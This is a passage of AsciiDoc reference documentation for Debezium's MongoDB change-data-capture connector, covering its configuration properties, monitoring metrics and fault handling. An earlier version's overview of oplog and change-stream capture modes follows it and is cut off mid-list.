monitoring. By default all databases are monitored.\nMust not be used with `database.exclude.list`.\n\n|[[mongodb-property-database-exclude-list]]<<mongodb-property-database-exclude-list, `+database.exclude.list+`>>\n|_empty string_\n|An optional comma-separated list of regular expressions that match database names to be excluded from monitoring; any database name not included in `database.exclude.list` is monitored.\nMust not be used with `database.include.list`.\n\n|[[mongodb-property-collection-include-list]]<<mongodb-property-collection-include-list, `+collection.include.list+`>>\n|_empty string_\n|An optional comma-separated list of regular expressions that match fully-qualified namespaces for MongoDB collections to be monitored; any collection not included in `collection.include.list` is excluded from monitoring. Each identifier is of the form _databaseName_._collectionName_. By default the connector will monitor all collections except those in the `local` and `admin` databases.\nMust not be used with `collection.exclude.list`.\n\n|[[mongodb-property-collection-exclude-list]]<<mongodb-property-collection-exclude-list, `+collection.exclude.list+`>>\n|_empty string_\n|An optional comma-separated list of regular expressions that match fully-qualified namespaces for MongoDB collections to be excluded from monitoring; any collection not included in `collection.exclude.list` is monitored. Each identifier is of the form _databaseName_._collectionName_.\nMust not be used with `collection.include.list`.\n\n|[[mongodb-property-snapshot-mode]]<<mongodb-property-snapshot-mode, `+snapshot.mode+`>>\n|`initial`\n|Specifies the criteria for running a snapshot upon startup of the connector. The default is *initial*, and specifies that the connector reads a snapshot when either no offset is found or if the oplog\/change stream no longer contains the previous offset. The *never* option specifies that the connector should never use snapshots, instead the connector should proceed to tail the log.\n\n|[[mongodb-property-capture-mode]]<<mongodb-property-capture-mode, `+capture.mode+`>>\n|`change_streams_update_full`\n|Specifies the method used to capture changes from the MongoDB server. The default is *change_streams_update_full*, and specifies that the connector captures changes via MongoDB Change Streams mechanism, and that _update_ events should contain the full document. The *change_streams* mode will use the same capturing method, but _update_ events won't contain the full document. +\nThe *oplog* mode specifies that the MongoDB oplog will be accessed directly; this is the legacy method and should not be used for new connector instances.\n\n|[[mongodb-property-snapshot-include-collection-list]]<<mongodb-property-snapshot-include-collection-list, `+snapshot.include.collection.list+`>>\n| All collections specified in `collection.include.list`\n|An optional, comma-separated list of regular expressions that match names of schemas specified in `collection.include.list` for which you *want* to take the snapshot.\n\n|[[mongodb-property-field-exclude-list]]<<mongodb-property-field-exclude-list, `+field.exclude.list+`>>\n|_empty string_\n|An optional comma-separated list of the fully-qualified names of fields that should be excluded from change event message values. Fully-qualified names for fields are of the form _databaseName_._collectionName_._fieldName_._nestedFieldName_, where _databaseName_ and _collectionName_ may contain the wildcard (*) which matches any characters.\n\n|[[mongodb-property-field-renames]]<<mongodb-property-field-renames, `+field.renames+`>>\n|_empty string_\n|An optional comma-separated list of the fully-qualified replacements of fields that should be used to rename fields in change event message values. Fully-qualified replacements for fields are of the form _databaseName_._collectionName_._fieldName_._nestedFieldName_:__newNestedFieldName__, where _databaseName_ and _collectionName_ may contain the wildcard (*) which matches any characters, the colon character (:) is used to determine rename mapping of field. The next field replacement is applied to the result of the previous field replacement in the list, so keep this in mind when renaming multiple fields that are in the same path.\n\n|[[mongodb-property-tasks-max]]<<mongodb-property-tasks-max, `+tasks.max+`>>\n|`1`\n|The maximum number of tasks that should be created for this connector. The MongoDB connector will attempt to use a separate task for each replica set, so the default is acceptable when using the connector with a single MongoDB replica set. When using the connector with a MongoDB sharded cluster, we recommend specifying a value that is equal to or more than the number of shards in the cluster, so that the work for each replica set can be distributed by Kafka Connect.\n\n|[[mongodb-property-snapshot-max-threads]]<<mongodb-property-snapshot-max-threads, `+snapshot.max.threads+`>>\n|`1`\n|Positive integer value that specifies the maximum number of threads used to perform an intial sync of the collections in a replica set. Defaults to 1.\n\n|[[mongodb-property-tombstones-on-delete]]<<mongodb-property-tombstones-on-delete, `+tombstones.on.delete+`>>\n|`true`\n|Controls whether a _delete_ event is followed by a tombstone event. +\n +\n`true` - a delete operation is represented by a _delete_ event and a subsequent tombstone event. +\n +\n`false` - only a _delete_ event is emitted. +\n +\nAfter a source record is deleted, emitting a tombstone event (the default behavior) allows Kafka to completely delete all events that pertain to the key of the deleted row in case {link-kafka-docs}\/#compaction[log compaction] is enabled for the topic.\n\n|[[mongodb-property-snapshot-delay-ms]]<<mongodb-property-snapshot-delay-ms, `+snapshot.delay.ms+`>>\n|\n|An interval in milliseconds that the connector should wait before taking a snapshot after starting up; +\nCan be used to avoid snapshot interruptions when starting multiple connectors in a cluster, which may cause re-balancing of connectors.\n\n|[[mongodb-property-snapshot-fetch-size]]<<mongodb-property-snapshot-fetch-size, `+snapshot.fetch.size+`>>\n|`0`\n|Specifies the maximum number of documents that should be read in one go from each collection while taking a snapshot.\nThe connector will read the collection contents in multiple batches of this size. +\nDefaults to 0, which indicates that the server chooses an appropriate fetch size.\n\n|[[mongodb-property-schema-name-adjustment-mode]]<<mongodb-property-schema-name-adjustment-mode,`+schema.name.adjustment.mode+`>>\n|avro\n|Specifies how schema names should be adjusted for compatibility with the message converter used by the connector. Possible settings: +\n\n* `avro` replaces the characters that cannot be used in the Avro type name with underscore. +\n* `none` does not apply any adjustment. +\n\n|===\n\nThe following _advanced_ configuration properties have good defaults that will work in most situations and therefore rarely need to be specified in the connector's configuration.\n\n[id=\"debezium-mongodb-connector-advanced-configuration-properties\"]\n.{prodname} MongoDB connector advanced configuration properties\n[cols=\"30%a,25%a,45%a\",options=\"header\"]\n|===\n|Property\n|Default\n|Description\n\n|[[mongodb-property-max-batch-size]]<<mongodb-property-max-batch-size, `+max.batch.size+`>>\n|`2048`\n|Positive integer value that specifies the maximum size of each batch of events that should be processed during each iteration of this connector. Defaults to 2048.\n\n|[[mongodb-property-max-queue-size]]<<mongodb-property-max-queue-size, `+max.queue.size+`>>\n|`8192`\n|Positive integer value that specifies the maximum number of records that the blocking queue can hold.\nWhen {prodname} reads events streamed from the database, it places the events in the blocking queue before it writes them to Kafka.\nThe blocking queue can provide backpressure for reading change events from the database\nin cases where the connector ingests messages faster than it can write them to Kafka, or when Kafka becomes unavailable.\nEvents that are held in the queue are disregarded when the connector periodically records offsets.\nAlways set the value of `max.queue.size` to be larger than the value of xref:{context}-property-max-batch-size[`max.batch.size`].\n\n|[[mongodb-property-max-queue-size-in-bytes]]<<mongodb-property-max-queue-size-in-bytes, `+max.queue.size.in.bytes+`>>\n|`0`\n|A long integer value that specifies the maximum volume of the blocking queue in bytes.\nBy default, volume limits are not specified for the blocking queue.\nTo specify the number of bytes that the queue can consume, set this property to a positive long value. +\nIf xref:mongodb-property-max-queue-size[`max.queue.size`] is also set, writing to the queue is blocked when the size of the queue reaches the limit specified by either property.\nFor example, if you set `max.queue.size=1000`, and `max.queue.size.in.bytes=5000`, writing to the queue is blocked after the queue contains 1000 records, or after the volume of the records in the queue reaches 5000 bytes.\n\n|[[mongodb-property-poll-interval-ms]]<<mongodb-property-poll-interval-ms, `+poll.interval.ms+`>>\n|`1000`\n|Positive integer value that specifies the number of milliseconds the connector should wait during each iteration for new change events to appear. Defaults to 1000 milliseconds, or 1 second.\n\n|[[mongodb-property-connect-backoff-initial-delay-ms]]<<mongodb-property-connect-backoff-initial-delay-ms, `+connect.backoff.initial.delay.ms+`>>\n|`1000`\n|Positive integer value that specifies the initial delay when trying to reconnect to a primary after the first failed connection attempt or when no primary is available. Defaults to 1 second (1000 ms).\n\n|[[mongodb-property-connect-backoff-max-delay-ms]]<<mongodb-property-connect-backoff-max-delay-ms, `+connect.backoff.max.delay.ms+`>>\n|`1000`\n|Positive integer value that specifies the maximum delay when trying to reconnect to a primary after repeated failed connection attempts or when no primary is available. Defaults to 120 seconds (120,000 ms).\n\n|[[mongodb-property-connect-max-attempts]]<<mongodb-property-connect-max-attempts, `+connect.max.attempts+`>>\n|`16`\n|Positive integer value that specifies the maximum number of failed connection attempts to a replica set primary before an exception occurs and task is aborted. Defaults to 16, which with the defaults for `connect.backoff.initial.delay.ms` and `connect.backoff.max.delay.ms` results in just over 20 minutes of attempts before failing.\n\n|[[mongodb-property-mongodb-members-auto-discover]]<<mongodb-property-mongodb-members-auto-discover, `+mongodb.members.auto.discover+`>>\n|`true`\n|Boolean value that specifies whether the addresses in 'mongodb.hosts' are seeds that should be used to discover all members of the cluster or replica set (`true`), or whether the address(es) in `mongodb.hosts` should be used as is (`false`). The default is `true` and should be used in all cases except where MongoDB is xref:{link-mongodb-connector}#mongodb-replicaset[fronted by a proxy].\n\nifdef::community[]\n|[[mongodb-property-source-struct-version]]<<mongodb-property-source-struct-version, `+source.struct.version+`>>\n|v2\n|Schema version for the `source` block in CDC events. {prodname} 0.10 introduced a few breaking +\nchanges to the structure of the `source` block in order to unify the exposed structure across\nall the connectors. +\nBy setting this option to `v1` the structure used in earlier versions can be produced.\nNote that this setting is not recommended and is planned for removal in a future {prodname} version.\nendif::community[]\n\n|[[mongodb-property-heartbeat-interval-ms]]<<mongodb-property-heartbeat-interval-ms, `+heartbeat.interval.ms+`>>\n|`0`\n|Controls how frequently heartbeat messages are sent. +\nThis property contains an interval in milliseconds that defines how frequently the connector sends messages into a heartbeat topic.\nThis can be used to monitor whether the connector is still receiving change events from the database.\nYou also should leverage heartbeat messages in cases where only records in non-captured collections are changed for a longer period of time.\nIn such situation the connector would proceed to read the oplog\/change stream from the database but never emit any change messages into Kafka,\nwhich in turn means that no offset updates are committed to Kafka.\nThis will cause the oplog files to be rotated out but connector will not notice it so on restart some events are no longer available which leads to the need of re-execution of the initial snapshot.\n\nSet this parameter to `0` to not send heartbeat messages at all. +\nDisabled by default.\n\n|[[mongodb-property-sanitize-field-names]]<<mongodb-property-sanitize-field-names, `+sanitize.field.names+`>>\n|`true` when connector configuration explicitly specifies the `key.converter` or `value.converter` parameters to use Avro, otherwise defaults to `false`.\n|Whether field names are sanitized to adhere to Avro naming requirements.\nifdef::community[]\nSee xref:{link-avro-serialization}#avro-naming[Avro naming] for more details.\nendif::community[]\n\n|[[mongodb-property-skipped-operations]]<<mongodb-property-skipped-operations, `+skipped.operations+`>>\n|\n| comma-separated list of operation types that will be skipped during streaming.\nThe operations include: `c` for inserts\/create, `u` for updates, and `d` for deletes.\nBy default, no operations are skipped.\n\n|[[mongodb-property-snapshot-collection-filter-overrides]]<<mongodb-property-snapshot-collection-filter-overrides, `+snapshot.collection.filter.overrides+`>>\n|\n| Controls which collection items are included in snapshot. This property affects snapshots only. Specify a comma-separated list of collection names in the form _databaseName.collectionName_.\n\nFor each collection that you specify, also specify another configuration property: `snapshot.collection.filter.overrides._databaseName_._collectionName_`. For example, the name of the other configuration property might be: `snapshot.collection.filter.overrides.customers.orders`. Set this property to a valid filter expression that retrieves only the items that you want in the snapshot. When the connector performs a snapshot, it retrieves only the items that matches the filter expression.\n\n\n|[[mongodb-property-provide-transaction-metadata]]<<mongodb-property-provide-transaction-metadata, `+provide.transaction.metadata+`>>\n|`false`\n|When set to `true` {prodname} generates events with transaction boundaries and enriches data events envelope with transaction metadata.\n\nSee xref:{link-mongodb-connector}#mongodb-transaction-metadata[Transaction Metadata] for additional details.\n\n|[[mongodb-property-retriable-restart-connector-wait-ms]]<<mongodb-property-retriable-restart-connector-wait-ms, `+retriable.restart.connector.wait.ms+`>>\n|10000 (10 seconds)\n|The number of milliseconds to wait before restarting a connector after a retriable error occurs.\n\n|[[mongodb-property-mongodb-poll-interval-ms]]<<mongodb-property-mongodb-poll-interval-ms, `+mongodb.poll.interval.ms+`>>\n|`30000`\n|The interval in which the connector polls for new, removed, or changed replica sets.\n\n|[[mongodb-property-mongodb-connect-timeout-ms]]<<mongodb-property-mongodb-connect-timeout-ms, `+mongodb.connect.timeout.ms+`>>\n|10000 (10 seconds)\n|The number of milliseconds the driver will wait before a new connection attempt is aborted.\n\n|[[mongodb-property-mongodb-socket-timeout-ms]]<<mongodb-property-mongodb-socket-timeout-ms, `+mongodb.socket.timeout.ms+`>>\n|0\n|The number of milliseconds before a send\/receive on the socket can take before a timeout occurs.\nA value of `0` disables this behavior.\n\n|[[mongodb-property-mongodb-server-selection-timeout-ms]]<<mongodb-property-mongodb-server-selection-timeout-ms, `+mongodb.server.selection.timeout.ms+`>>\n|30000 (30 seconds)\n|The number of milliseconds the driver will wait to select a server before it times out and throws an error.\n\n|[[mongodb-property-cursor-max-await-time-ms]]<<mongodb-property-cursor-max-await-time-ms, `+cursor.max.await.time.ms+`>>\n|`0`\n|Specifies the maximum number of milliseconds the oplog\/change stream cursor will wait for the server to produce a result before causing an execution timeout exception.\nA value of `0` indicates using the server\/driver default wait timeout.\n\n|[[mongodb-property-signal-data-collection]]<<mongodb-property-signal-data-collection, `+signal.data.collection+`>>\n|No default\n| Fully-qualified name of the data collection that is used to send {link-prefix}:{link-signalling}#debezium-signaling-enabling-signaling[signals] to the connector.\nUse the following format to specify the collection name: +\n`_<databaseName>_._<collectionName>_` +\nifdef::product[]\nSignaling is a Technology Preview feature for the {prodname} MongoDB connector.\nendif::product[]\n\n|[[mongodb-property-incremental-snapshot-chunk-size]]<<mongodb-property-incremental-snapshot-chunk-size, `+incremental.snapshot.chunk.size+`>>\n|`1024`\n|The maximum number of documents that the connector fetches and reads into memory during an incremental snapshot chunk.\nIncreasing the chunk size provides greater efficiency, because the snapshot runs fewer snapshot queries of a greater size.\nHowever, larger chunk sizes also require more memory to buffer the snapshot data.\nAdjust the chunk size to a value that provides the best performance in your environment. +\nifdef::product[]\nIncremental snapshots is a Technology Preview feature for the {prodname} MongoDB connector.\nendif::product[]\n\n|[[mongodb-property-topic-naming-strategy]]<<mongodb-property-topic-naming-strategy, `topic.naming.strategy`>>\n|`io.debezium.schema.DefaultTopicNamingStrategy`\n|The name of the TopicNamingStrategy class that should be used to determine the topic name for data change, schema change, transaction, heartbeat event etc., defaults to `DefaultTopicNamingStrategy`.\n\n|[[mongodb-property-topic-delimiter]]<<mongodb-property-topic-delimiter, `topic.delimiter`>>\n|`.`\n|Specify the delimiter for topic name, defaults to `.`.\n\n|[[mongodb-property-topic-prefix]]<<mongodb-property-topic-prefix, `topic.prefix`>>\n|`${mongodb.name}`\n|The name of the prefix to be used for all topics, defaults to xref:mongodb-property-mongodb-name[`${mongodb.name}`].\n[NOTE]\n====\nOnce specify the prefix value to this property, the xref:mongodb-property-mongodb-name[`${mongodb.name}`] will not play the prefix role of all topics.\n====\n\n|[[mongodb-property-topic-cache-size]]<<mongodb-property-topic-cache-size, `topic.cache.size`>>\n|`10000`\n|The size used for holding the topic names in bounded concurrent hash map. This cache will help to determine the topic name corresponding to a given data collection.\n\n|[[mongodb-property-topic-heartbeat-prefix]]<<mongodb-property-topic-heartbeat-prefix, `+topic.heartbeat.prefix+`>>\n|`__debezium-heartbeat`\n|Controls the name of the topic to which the connector sends heartbeat messages. The topic name has this pattern: +\n +\n_topic.heartbeat.prefix_._topic.prefix_ +\n +\nFor example, if the database server name or topic prefix is `fulfillment`, the default topic name is `__debezium-heartbeat.fulfillment`.\n\n|[[mongodb-property-topic-transaction]]<<mongodb-property-topic-transaction, `topic.transaction`>>\n|`transaction`\n|Controls the name of the topic to which the connector sends transaction metadata messages. The topic name has this pattern: +\n +\n_topic.prefix_._topic.transaction_ +\n +\nFor example, if the database server name or topic prefix is `fulfillment`, the default topic name is `fulfillment.transaction`.\n\n|===\n\n\/\/ Type: assembly\n\/\/ ModuleID: monitoring-debezium-mongodb-connector-performance\n\/\/ Title: Monitoring {prodname} MongoDB connector performance\n[[mongodb-monitoring]]\n== Monitoring\n\nThe {prodname} MongoDB connector has two metric types in addition to the built-in support for JMX metrics that Zookeeper, Kafka, and Kafka Connect have.\n\n* xref:{link-mongodb-connector}#mongodb-snapshot-metrics[Snapshot metrics] provide information about connector operation while performing a snapshot.\n* xref:{link-mongodb-connector}#mongodb-streaming-metrics[Streaming metrics] provide information about connector operation when the connector is capturing changes and streaming change event records.\n\nThe xref:{link-debezium-monitoring}#monitoring-debezium[{prodname} monitoring documentation] provides details about how to expose these metrics by using JMX.\n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-during-mongodb-snapshots\n\/\/ Title: Monitoring {prodname} during MongoDB snapshots\n[[mongodb-snapshot-metrics]]\n=== Snapshot Metrics\n\ninclude::{partialsdir}\/modules\/all-connectors\/frag-common-mbean-name.adoc[leveloffset=+1,tags=mongodb-snapshot]\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-snapshot-metrics.adoc[leveloffset=+1]\n\nThe {prodname} MongoDB connector also provides the following custom snapshot metrics:\n\n[cols=\"3,2,5\",options=\"header\"]\n|===\n|Attribute |Type |Description\n\n|`NumberOfDisconnects`\n|`long`\n|Number of database disconnects.\n\n|===\n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-mongodb-connector-record-streaming\n\/\/ Title: Monitoring {prodname} MongoDB connector record streaming\n[[mongodb-streaming-metrics]]\n=== Streaming Metrics\n\ninclude::{partialsdir}\/modules\/all-connectors\/frag-common-mbean-name.adoc[leveloffset=+1,tags=mongodb-streaming]\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-streaming-metrics.adoc[leveloffset=+1]\n\nThe {prodname} MongoDB connector also provides the following custom streaming metrics:\n\n[cols=\"3,2,5\",options=\"header\"]\n|===\n|Attribute |Type |Description\n\n|`NumberOfDisconnects`\n|`long`\n|Number of database disconnects.\n\n|`NumberOfPrimaryElections`\n|`long`\n|Number of primary node elections.\n\n|===\n\n\/\/ Type: concept\n\/\/ ModuleID: how-debezium-mongodb-connectors-handle-faults-and-problems\n\/\/ Title: How {prodname} MongoDB connectors handle faults and problems\n[[mongodb-when-things-go-wrong]]\n== MongoDB connector common issues\n\n{prodname} is a distributed system that captures all changes in multiple upstream databases, and will never miss or lose an event.\nWhen the system is operating normally and is managed carefully, then {prodname} provides _exactly once_ delivery of every change event.\n\nIf a fault occurs, the system does not lose any events.\nHowever, while it is recovering from the fault, it might repeat some change events.\nIn such situations, {prodname}, like Kafka, provides _at least once_ delivery of change events.\n\nifdef::community[]\nThe rest of this section describes how {prodname} handles various kinds of faults and problems.\nendif::community[]\n\nifdef::product[]\nThe following topics provide details about how the {prodname} MongoDB connector handles various kinds of faults and problems.\n\n* xref:debezium-mongodb-connector-configuration-and-startup-errors[]\n* xref:mongodb-becomes-unavailable-while-debezium-is-running[]\n* xref:debezium-mongodb-kafka-connect-process-stops-gracefully[]\n* xref:debezium-mongodb-kafka-connect-process-crashes[]\n* xref:debezium-mongodb-kafka-process-becomes-unavailable[]\n* xref:debezium-mongodb-connector-is-stopped-for-a-long-interval[]\n* xref:mongodb-crash-results-in-lost-commits[]\n\nendif::product[]\n\n[id=\"debezium-mongodb-connector-configuration-and-startup-errors\"]\n=== Configuration and startup errors\n\nIn the following situations, the connector fails when trying to start, reports an error or exception in the log, and stops running:\n\n* The connector's configuration is invalid.\n* The connector cannot successfully connect to MongoDB by using the specified connection parameters.\n\nAfter a failure, the connector attempts to reconnect by using exponential backoff.\nYou can configure the maximum number of reconnection attempts.\n\nIn these cases, the error will have more details about the problem and possibly a suggested work around. The connector can be restarted when the configuration has been corrected or the MongoDB problem has been addressed.\n\n[id=\"mongodb-becomes-unavailable-while-debezium-is-running\"]\n=== MongoDB becomes unavailable\n\nOnce the connector is running, if the primary node of any of the MongoDB replica sets become unavailable or unreachable, the connector will repeatedly attempt to reconnect to the primary node, using exponential backoff to prevent saturating the network or servers. If the primary remains unavailable after the configurable number of connection attempts, the connector will fail.\n\nThe attempts to reconnect are controlled by three properties:\n\n* `connect.backoff.initial.delay.ms` - The delay before attempting to reconnect for the first time, with a default of 1 second (1000 milliseconds).\n* `connect.backoff.max.delay.ms` - The maximum delay before attempting to reconnect, with a default of 120 seconds (120,000 milliseconds).\n* `connect.max.attempts` - The maximum number of attempts before an error is produced, with a default of 16.\n\nEach delay is double that of the prior delay, up to the maximum delay. Given the default values, the following table shows the delay for each failed connection attempt and the total accumulated time before failure.\n\n[cols=\"30%a,30%a,40%a\",options=\"header\"]\n|===\n|Reconnection attempt number\n|Delay before attempt, in seconds\n|Total delay before attempt, in minutes and seconds\n\n|1 |1 |00:01\n|2 |2 |00:03\n|3 |4 |00:07\n|4 |8 |00:15\n|5 |16 |00:31\n|6 |32 |01:03\n|7 |64 |02:07\n|8 |120|04:07\n|9 |120|06:07\n|10 |120|08:07\n|11 |120|10:07\n|12 |120|12:07\n|13 |120|14:07\n|14 |120|16:07\n|15 |120|18:07\n|16 |120|20:07\n|===\n\n[id=\"debezium-mongodb-kafka-connect-process-stops-gracefully\"]\n=== Kafka Connect process stops gracefully\n\nIf Kafka Connect is being run in distributed mode, and a Kafka Connect process is stopped gracefully, then prior to shutdown of that processes Kafka Connect will migrate all of the process' connector tasks to another Kafka Connect process in that group, and the new connector tasks will pick up exactly where the prior tasks left off.\nThere is a short delay in processing while the connector tasks are stopped gracefully and restarted on the new processes.\n\nIf the group contains only one process and that process is stopped gracefully, then Kafka Connect will stop the connector and record the last offset for each replica set. Upon restart, the replica set tasks will continue exactly where they left off.\n\n[id=\"debezium-mongodb-kafka-connect-process-crashes\"]\n=== Kafka Connect process crashes\n\nIf the Kafka Connector process stops unexpectedly, then any connector tasks it was running will terminate without recording their most recently-processed offsets.\nWhen Kafka Connect is being run in distributed mode, it will restart those connector tasks on other processes.\nHowever, the MongoDB connectors will resume from the last offset _recorded_ by the earlier processes, which means that the new replacement tasks may generate some of the same change events that were processed just prior to the crash.\nThe number of duplicate events depends on the offset flush period and the volume of data changes just before the crash.\n\n[NOTE]\n====\nBecause there is a chance that some events may be duplicated during a recovery from failure, consumers should always anticipate some events may be duplicated. {prodname} changes are idempotent, so a sequence of events always results in the same state.\n\n{prodname} also includes with each change event message the source-specific information about the origin of the event, including the MongoDB event's unique transaction identifier (`h`) and timestamp (`sec` and `ord`). Consumers can keep track of other of these values to know whether it has already seen a particular event.\n====\n\n[id=\"debezium-mongodb-kafka-process-becomes-unavailable\"]\n=== Kafka becomes unavailable\n\nAs the connector generates change events, the Kafka Connect framework records those events in Kafka using the Kafka producer API. Kafka Connect will also periodically record the latest offset that appears in those change events, at a frequency that you have specified in the Kafka Connect worker configuration. If the Kafka brokers become unavailable, the Kafka Connect worker process running the connectors will simply repeatedly attempt to reconnect to the Kafka brokers. In other words, the connector tasks will simply pause until a connection can be reestablished, at which point the connectors will resume exactly where they left off.\n\n[id=\"debezium-mongodb-connector-is-stopped-for-a-long-interval\"]\n=== Connector is stopped for a long interval\n\nIf the connector is gracefully stopped, the replica sets can continue to be used and any new changes are recorded in MongoDB's oplog.\nWhen the connector is restarted, it will resume streaming changes for each replica set where it last left off, recording change events for all of the changes that were made while the connector was stopped.\nIf the connector is stopped long enough such that MongoDB purges from its oplog some operations that the connector has not read, then upon startup the connector will perform a snapshot.\n\nA properly configured Kafka cluster is capable of massive throughput.\nKafka Connect is written with Kafka best practices, and given enough resources will also be able to handle very large numbers of database change events.\nBecause of this, when a connector has been restarted after a while, it is very likely to catch up with the database, though how quickly will depend upon the capabilities and performance of Kafka and the volume of changes being made to the data in MongoDB.\n\n[NOTE]\n====\nIf the connector remains stopped for long enough, MongoDB might purge older oplog files and the connector's last position may be lost.\nIn this case, when the connector configured with _initial_ snapshot mode (the default) is finally restarted, the MongoDB server will no longer have the starting point and the connector will fail with an error.\n====\n\n[id=\"mongodb-crash-results-in-lost-commits\"]\n=== MongoDB loses writes\n\nIn certain failure situations, MongoDB can lose commits, which results in the MongoDB connector being unable to capture the lost changes.\nFor example, if the primary crashes suddenly after it applies a change and records the change to its oplog, the oplog might become unavailable before secondary nodes can read its contents.\nAs a result, the secondary node that is elected as the new primary node might be missing the most recent changes from its oplog.\n\nAt this time, there is no way to prevent this side effect in MongoDB.\n","old_contents":"\/\/ Category: debezium-using\n\/\/ Type: assembly\n[id=\"debezium-connector-for-mongodb\"]\n= {prodname} connector for MongoDB\n\n:context: mongodb\n:data-collection: collection\n:mbean-name: {context}\n:connector-file: {context}\n:connector-class: MongoDb\n:connector-name: MongoDB\nifdef::community[]\n\n:toc:\n:toc-placement: macro\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n\ntoc::[]\nendif::community[]\n\n{prodname}'s MongoDB connector tracks a MongoDB replica set or a MongoDB sharded cluster for document changes in databases and collections, recording those changes as events in Kafka topics.\nThe connector automatically handles the addition or removal of shards in a sharded cluster, changes in membership of each replica set, elections within each replica set, and awaiting the resolution of communications problems.\n\nifdef::community[]\nFor information about the MongoDB versions that are compatible with this connector, see the link:https:\/\/debezium.io\/releases\/[{prodname} release overview].\nendif::community[]\nifdef::product[]\nFor information about the MongoDB versions that are compatible with this connector, see the link:{LinkDebeziumSupportedConfigurations}[{NameDebeziumSupportedConfigurations}].\nendif::product[]\n\nifdef::product[]\n\nInformation and procedures for using a {prodname} MongoDB connector is organized as follows:\n\n* xref:overview-of-debezium-mongodb-connector[]\n* xref:how-debezium-mongodb-connectors-work[]\n* xref:descriptions-of-debezium-mongodb-connector-data-change-events[]\n* xref:setting-up-mongodb-to-work-with-debezium[]\n* xref:deployment-of-debezium-mongodb-connectors[]\n* xref:monitoring-debezium-mongodb-connector-performance[]\n* xref:how-debezium-mongodb-connectors-handle-faults-and-problems[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ Title: Overview of {prodname} MongoDB connector\n\/\/ ModuleID: overview-of-debezium-mongodb-connector\n[[mongodb-overview]]\n== Overview\n\nMongoDB's replication mechanism provides redundancy and high availability, and is the preferred way to run MongoDB in production.\nMongoDB connector captures the changes in a replica set or sharded cluster.\n\nA MongoDB _replica set_ consists of a set of servers that all have copies of the same data, and replication ensures that all changes made by clients to documents on the replica set's _primary_ are correctly applied to the other replica set's servers, called _secondaries_.\nMongoDB replication works by having the primary record the changes in its _oplog_ (or operation log), and then each of the secondaries reads the primary's oplog and applies in order all of the operations to their own documents.\nWhen a new server is added to a replica set, that server first performs an https:\/\/docs.mongodb.com\/manual\/core\/replica-set-sync\/[snapshot] of all of the databases and collections on the primary, and then reads the primary's oplog to apply all changes that might have been made since it began the snapshot.\nThis new server becomes a secondary (and able to handle queries) when it catches up to the tail of the primary's oplog.\n\nMongoDB connector supports two distinct modes of capturing the changes controlled by the xref:mongodb-property-capture-mode[`capture.mode`] option:\n\n* oplog based\n* change streams based\n\n'''\n\n=== Oplog capture mode (legacy)\n\nThe {prodname} MongoDB connector uses the same replication mechanism as described above, though it does not actually become a member of the replica set.\nJust like MongoDB secondaries, however, the connector always reads the oplog of the replica set's primary.\nAnd, when the connector sees a replica set for the first time, it looks at the oplog to get the last recorded transaction and then performs a snapshot of the primary's databases and collections.\nWhen all the data is copied, the connector then starts streaming changes from the position it read earlier from the oplog. Operations in the MongoDB oplog are https:\/\/docs.mongodb.com\/manual\/core\/replica-set-oplog\/[idempotent], so no matter how many times the operations are applied, they result in the same end state.\n\nThe disadvantage of this mode is that only _insert_ change events will contain the full document, whereas _update_ events only contain a representation of changed fields (i.e. unmodified fields cannot be obtained from an _update_ event), and _delete_ events contain no representation of the deleted document apart from its key.\n\nThis mode should be considered as the legacy one.\nIt is not supported on MongoDB 5 and the user is strongly advised to not use it for MongoDB 4.x server.\n\n=== Change Stream mode\n\nThe {prodname} MongoDB connector uses a similar replication mechanism to the one described above, though it does not actually become a member of the replica set.\nThe main difference is that the connector does not read the oplog directly, but delegates capturing and decoding the oplog to MongoDB's https:\/\/docs.mongodb.com\/manual\/changeStreams\/[Change Streams] feature.\nWith change streams, the MongoDB server exposes changes to collections as an event stream.\nThe {prodname} connector watches the stream and delivers the changes downstream.\nAnd, when the connector sees a replica set for the first time, it looks at the oplog to get the last recorded transaction and then performs a snapshot of the primary's databases and collections.\nWhen all the data is copied, the connector then creates a change stream from the position it read earlier from the oplog.\n\nThis is the recommended mode starting with MongoDB 4.x.\n\n[WARNING]\n====\nBoth capture modes use different values stored in offsets that allow them to resume streaming from the last position seen after a connector restart.\nThus it is not possible to switch from the change streams mode to the oplog mode.\nTo prevent any inadvertent capture mode changes, the connector has a built-in safety check.\n\nWhen the connector is started it checks the stored offsets.\nIf the original capture mode was oplog-based and the new mode is change streams based, then it will try to migrate to change streams.\nIf the original capture mode was change streams based, it will keep using change streams, also if the new mode is oplog-based, and a warning about this will be emitted to the logs.\n====\n\nAs the MongoDB connector processes changes, it periodically records the position in the oplog\/stream where the event originated.\nWhen the connector stops, it records the last oplog\/stream position that it processed, so that upon restart it simply begins streaming from that position.\nIn other words, the connector can be stopped, upgraded or maintained, and restarted some time later, and it will pick up exactly where it left off without losing a single event.\nOf course, MongoDB's oplogs are usually capped at a maximum size, which means that the connector should not be stopped for too long, or else some of the operations in the oplog might be purged before the connector has a chance to read them.\nIn this case, upon restart the connector will detect the missing oplog operations, perform a snapshot, and then proceed with streaming the changes.\n\nThe MongoDB connector is also quite tolerant of changes in membership and leadership of the replica sets, of additions or removals of shards within a sharded cluster, and network problems that might cause communication failures.\nThe connector always uses the replica set's primary node to stream changes, so when the replica set undergoes an election and a different node becomes primary, the connector will immediately stop streaming changes, connect to the new primary, and start streaming changes using the new primary node.\nLikewise, if connector experiences any problems communicating with the replica set primary, it will try to reconnect (using exponential backoff so as to not overwhelm the network or replica set) and continue streaming changes from where it last left off.\nIn this way the connector is able to dynamically adjust to changes in replica set membership and to automatically handle communication failures.\n\n.Additional resources\n\n* link:https:\/\/docs.mongodb.com\/manual\/replication\/[Replication mechanism]\n* link:https:\/\/docs.mongodb.com\/manual\/tutorial\/deploy-replica-set\/[Replica set]\n* link:https:\/\/docs.mongodb.com\/manual\/core\/replica-set-elections\/[Replica set elections]\n* link:https:\/\/docs.mongodb.com\/manual\/core\/sharded-cluster-components\/[Sharded cluster]\n* link:https:\/\/docs.mongodb.com\/manual\/tutorial\/add-shards-to-shard-cluster\/[Shard addition]\n* link:https:\/\/docs.mongodb.com\/manual\/tutorial\/remove-shards-from-cluster\/[Shard removal]\n* 